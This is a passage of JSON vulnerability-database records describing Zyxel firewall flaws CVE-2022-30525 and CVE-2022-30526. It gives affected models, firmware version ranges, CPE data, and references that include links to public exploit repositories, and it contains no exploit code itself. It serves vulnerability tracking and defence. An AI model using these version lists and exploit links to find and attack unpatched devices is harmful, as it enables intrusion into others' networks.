        "data": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30525"
          }
        ],
        "trust": 0.99
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-30525",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "167182",
            "trust": 1.6
          },
          {
            "db": "PACKETSTORM",
            "id": "167372",
            "trust": 1.6
          },
          {
            "db": "PACKETSTORM",
            "id": "168202",
            "trust": 1.6
          },
          {
            "db": "PACKETSTORM",
            "id": "167176",
            "trust": 1.6
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022060004",
            "trust": 0.6
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022080075",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2022051308",
            "trust": 0.6
          },
          {
            "db": "EXPLOIT-DB",
            "id": "50946",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30525",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30525"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "id": "VAR-202205-0957",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.29351852333333334
      },
      "last_update_date": "2023-12-18T13:59:38.680000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel Technology  USG FLEX Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=192898"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/iveresk/cve-2022-30525 "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/pytersmithdarkghost/exploitcve202230525 "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/jbaines-r7/victorian_machinery "
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/ygoldking/cve-2022-30525 "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30525"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "http://packetstormsecurity.com/files/167182/zyxel-firewall-ztp-unauthenticated-command-injection.html"
          },
          {
            "trust": 2.2,
            "url": "http://packetstormsecurity.com/files/167372/zyxel-usg-flex-5.21-command-injection.html"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/167176/zyxel-remote-command-execution.html"
          },
          {
            "trust": 1.6,
            "url": "http://packetstormsecurity.com/files/168202/zyxel-firewall-suid-binary-privilege-escalation.html"
          },
          {
            "trust": 1.6,
            "url": "https://www.zyxel.com/support/zyxel-security-advisory-for-os-command-injection-vulnerability-of-firewalls.shtml"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022080075"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022051308"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022060004"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/50946"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-30525/"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30525"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-05-12T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-30525"
          },
          {
            "date": "2022-05-12T14:15:07.053000",
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "date": "2022-05-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-10-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-30525"
          },
          {
            "date": "2022-10-19T18:32:19.340000",
            "db": "NVD",
            "id": "CVE-2022-30525"
          },
          {
            "date": "2022-09-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "USG FLEX Operating system command injection vulnerability",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3104"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202207-1298

    Vulnerability from variot - Updated: 2023-12-18 13:59

    A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device. ZyXEL The product contains a vulnerability in permission management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202207-1298",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "usg flex 50w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "zywall 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "zywall 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg20-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.09"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg20w-vpn",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "zywall 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.30"
          },
          {
            "model": "usg60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 2200-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "zywall 110",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20w-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 310",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
